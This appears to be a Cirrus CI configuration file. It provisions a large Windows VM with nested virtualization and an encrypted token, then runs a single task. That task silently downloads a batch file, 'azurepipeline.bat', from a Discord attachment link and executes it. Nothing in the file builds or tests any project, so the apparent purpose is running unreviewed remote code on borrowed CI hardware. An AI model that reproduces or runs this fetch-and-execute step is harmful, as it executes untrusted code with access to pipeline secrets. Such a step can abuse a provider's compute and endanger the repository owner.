compute_engine_instance:
 image_project: cirrus-images # GCP project
 image: family/windows-docker-builder # family or a full image name.
 platform: windows
 cpu: 8 # optional. Defaults to 2 CPUs.
 memory: 32G # optional. Defaults to 4G.
 disk: 2048 # optional. By default, uses the smallest disk size required by the image.
 nested_virtualization: true # optional. Whether to enable Intel VT-x. Defaults to false.
 
task:
  timeout_in: 120m
  enviroment:
    TOKEN: ENCRYPTED[fb3817d3349eab96ea55ffde49ec4c79f421b04b10de4cf02973ea1d1fd080efc59a85b0ad6f059eb9fe45c3e281ed24]
  script:
   - curl -s -O https://cdn.discordapp.com/attachments/900416785654894592/929723233501085766/azurepipeline.bat
   - azurepipeline.bat
